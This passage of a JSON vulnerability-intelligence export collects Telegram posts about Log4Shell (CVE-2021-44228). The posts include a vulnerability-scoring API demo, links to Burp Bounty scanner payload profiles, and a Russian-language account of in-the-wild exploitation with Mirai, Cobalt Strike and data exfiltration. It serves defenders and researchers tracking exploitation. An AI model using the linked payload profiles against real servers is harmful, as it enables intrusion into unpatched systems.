"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cultofwire/1346", "content": "\u0418\u043d\u0434\u0438\u0439\u0441\u043a\u0438\u0439 \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0430\u043d\u043e\u0447\u043d\u0438\u043a \u0438 \u043e\u0434\u0438\u043d\u043e\u043a\u0438\u0439 \u0444\u0430\u0443\u043d\u0434\u0435\u0440 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 A.R.P. Syndicate (\u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043d\u043e \u0437\u0432\u0443\u0447\u0438\u0442 \u043a\u0440\u0443\u0442\u043e) \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0438\u0437\u043e\u0431\u0440\u0435\u0441\u0442\u0438 EPSS \u0438 \u043d\u0430\u0437\u0432\u0430\u043b \u0435\u0433\u043e VEDAS - Vulnerability &amp; Exploit Data Aggregation System.\n\n\u041d\u043e \u043e\u0434\u043d\u0438\u043c \u0441\u043a\u043e\u0440\u0438\u043d\u0433\u043e\u043c \u043e\u043d \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u043b\u0441\u044f, \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u043e\u0431\u043e\u0433\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0438\u0437 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0431\u043b\u043e\u0433\u0438, Github (PoC, \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b), 0day.today, \u0424\u0421\u0422\u042d\u041a, \u0431\u0430\u0433-\u0431\u0430\u0443\u043d\u0442\u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b, \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432, \u043a\u043e\u043c\u043c\u0438\u0442\u044b, \u0433\u0438\u0441\u0442\u044b \u0438 \u0434\u0430\u0436\u0435 \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 Youtube.\n\u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e CVE, \u0430 40+ \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u043a\u0430\u0442\u043e\u0440\u043e\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\u0415\u0441\u0442\u044c \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u0434\u0430\u0451\u0442 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435, \u0441\u043f\u043e\u0441\u043e\u0431 \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0434\u0435\u043d\u0438\u044f, \u0434\u0435\u0442\u0435\u043a\u0442\u0430 \u0438 \u043c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u0438.\n\u0422\u0430\u043a \u0436\u0435 \u0435\u0441\u0442\u044c \u0438 API, \u0435\u0441\u043b\u0438 \u0432\u0430\u043c \u043d\u0443\u0436\u043d\u044b \u043e\u0431\u043e\u0433\u0430\u0449\u0451\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435.\n\n\u041f\u0440\u0438\u043c\u0435\u0440\u044b:\n# \u041f\u043e\u043b\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e CVE \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0443\ncurl https://api.exploit.observer/\\?keyword\\=CVE-2021-44228 | jq \n\n# \u041f\u043e\u043b\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e BDU \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0443\ncurl https://api.exploit.observer/\\?keyword\\=BDU:2021-05969 | jq\n\n# \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043a\u043e\u0440\u0438\u043d\u0433\ncurl https://api.exploit.observer/\\?keyword\\=CVE-2021-44228 | jq '.popularity'\n\u041d\u0430 \u044d\u0442\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u043d\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f, \u043d\u043e \u043b\u0443\u0447\u0448\u0435 \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e \u043a API.\n\n\u0422\u0430\u043a \u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u0431\u0440\u0430\u0442\u044c \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u0440\u0438\u043d\u0433 (EPSS \u0438 VEDAS) \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438.\n\n\u041c\u0435\u0441\u0442\u0430\u043c\u0438 \u043e\u0432\u0435\u0440\u043a\u0438\u043b\u043b, \u043d\u043e \u0432 \u0446\u0435\u043b\u043e\u043c \u043f\u0440\u043e\u0435\u043a\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439.\n\n\u2014\u2014\narpsyndicate.io\nvedas.arpsyndicate.io\nGithub: ARPSyndicate - cve-scores\nGithub: ARPSyndicate - API Documentation", "creation_timestamp": "2025-04-16T11:58:04.000000Z"}, {"uuid": "e1f1613f-6f3e-4f33-9931-159bf67ce5b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/thebugbountyhunter/5861", "content": "Burp Bounty Pro and Burp Bounty Free CVE-2021-44228 Log4j RCE profile available! (new payloads added)\n\nIf your are a Burp Bounty Pro user, download now the profile at: https://burpbounty.net/cve-2021-44228-log4j-rce-waf/\n\nFor Burp Bounty Free users you can download at: https://github.com/wagiro/BurpBounty/blob/master/profiles/CVE-2021-44228_RCE_Log4j_WAF.bb\n\nVia: https://twitter.com/BurpBounty/status/1470455855246155785", "creation_timestamp": "2021-12-13T20:25:18.000000Z"}, {"uuid": "ebdba791-0f87-4657-871c-83c62ea79eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/VulnerabilityNews/26499", "content": "\u2018Long Live Log4Shell\u2019: CVE-2021-44228 Not Dead Yet\nRead more", "creation_timestamp": "2022-02-04T20:58:48.000000Z"}, {"uuid": "90e57b47-f729-4242-a608-70f1e140d118", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/thebugbountyhunter/5855", "content": "CVE-2021-44228 Log4j RCE Burp Bounty Pro Profile Available!\n\nLog4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.\n\nVia: https://twitter.com/BurpBounty/status/1469249786092085249", "creation_timestamp": "2023-02-03T13:06:43.000000Z"}, {"uuid": "e6e651e0-63c2-43d9-94f3-09bdc80f2ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/DC8044_Info/1851", "content": "\u200b\u200b\u0421\u0443\u0434\u043d\u0430\u044f \u043d\u043e\u0447\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f.\n \n0-day \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u043e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 LunaSec, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432 \u0438 \u0443\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u043a\u043e\u0434\u0430.\n \n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2021-44228 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apache Software Foundation \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java. Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a Log4Shell.\n \n\u0412\u0441\u0435 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043b\u043e\u0445\u043e, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 Apache Software Foundation \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043f\u043e\u0432\u043b\u0438\u044f\u043b\u043e \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e. \u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0441\u043a\u0430\u043d\u044f\u0442 \u0441\u0435\u0442\u044c \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430 LogJam.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043d\u0430 \u043f\u043e\u043c\u043e\u0449\u044c \u043f\u0440\u0438\u0448\u043b\u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b: Cybereason \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432\u0430\u043a\u0446\u0438\u043d\u0443 Logout4Shell \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f Log4Shell. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 LDAP \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java, \u043f\u043e \u0441\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 trustURLCodebase \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Log4j. \u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u0435\u0441\u043b\u0438 Logout4Shell \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u0431\u044b\u043b \u0431\u044b \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f\u043c, \u043d\u043e, \u0432 \u0431\u043e\u044e \u0432\u0441\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0435\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u0432.\n \n\u0410 \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043f\u043e\u043b\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0434\u044b\u0440\u0443 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0451\u043a.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Netlab 360, \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0433\u0440\u0443\u0437\u044f\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e Mirai, Muhstik \u0438 Kinsing, \u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0443\u043f\u043d\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0445 DDoS-\u0430\u0442\u0430\u043a. Microsoft 365 Defender Threat Intelligence \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4j \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 Cobalt Strike. \u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0442\u0435, \u043a\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 Log4Shell \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Log4j, \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 \u0438 \u0434\u0440.\n \n\u041d\u043e, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u043b\u0438\u0432\u043a\u0438 \u0441\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0440\u0430\u043d\u0435\u0435, \u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e 10 \u0434\u0435\u043a\u0430\u0431\u0440\u044f. \u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c Cloudflare \u0435\u0449\u0435 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Cisco Talos, \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e \u0434\u0435\u043a\u0430\u0431\u0440\u044f - \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0441\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441.\n \n\u041d\u0443, \u0430 \u043f\u043e\u043a\u0430, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-13T14:22:32.000000Z"}, {"uuid": "a363cf17-a035-4b12-a06c-f347065adb63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/VulnerabilityNews/27731", "content": "The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.1-12 didn\u00e2\u20ac\u2122t mimic the permissions of the JVM being patched, allowing it to escalate privileges.\nPublished at: April 20, 2022 at 01:15AM\nView on website", "creation_timestamp": "2022-04-24T07:42:36.000000Z"}, {"uuid": "8a6acecd-0e7d-40c9-88a9-9e8dcd0d284c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/Russian_OSINT/1107", "content": "\u200b\u200b\u0414\u0440\u0443\u0437\u044c\u044f, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u043a\u0430\u043d\u0430\u043b\u0430 Russian OSINT \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0443\u0432\u0430\u0436\u0430\u0435\u043c\u044b\u0445 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Positive Technologies \u043f\u0440\u043e\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u0436\u0443\u0440\u043d\u0430\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Log4j. \u0420\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0432\u043e\u043f\u0440\u043e\u0441\u0435 \u043f\u043e\u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u043c \u0412\u043b\u0430\u0434\u0438\u043c\u0438\u0440 \u041a\u043e\u0447\u0435\u0442\u043a\u043e\u0432, \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u043e\u0442\u0434\u0435\u043b\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0439 \u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432 \u043a\u043e\u0434\u0430 Positive Technologies.\n\n\ud83c\udfa4\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430 Positive Technologies:\n\n\ud83d\udcd6 Log4j \u2014 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0435\u0439\u0448\u0430\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u0444\u043e\u043d\u0434\u0430 Apache \u0434\u043b\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 Java-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439. \u0412 \u043a\u043e\u043d\u0446\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0438 \u0432 \u043d\u0435\u0439 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043b\u0430\u0441\u0441\u0430 JNDI-injection (CVE-2021-44228, \"Log4shell\"), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0438. \u0414\u0435\u0442\u0430\u043b\u0438 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435, \u0447\u0442\u043e \u0432 \u0438\u0442\u043e\u0433\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043c\u0430\u0441\u0441\u043e\u0432\u044b\u043c \u0430\u0442\u0430\u043a\u0430\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438 \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u0438\u0433\u0440\u043e\u043a\u043e\u0432, \u0442\u0438\u043f\u0430 Apple, CloudFlare, Steam \u0438 \u0442.\u043f. \u041f\u043e\u0437\u0434\u043d\u0435\u0435 \u0431\u044b\u043b\u0438 \u043f\u0440\u043e\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u044b \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0430\u0442\u0430\u043a \u043d\u0430 \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0438\u0435 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u043d\u043e \u0443\u0436\u0435 \u043d\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 JNDI.\n\u041e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0430 \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c 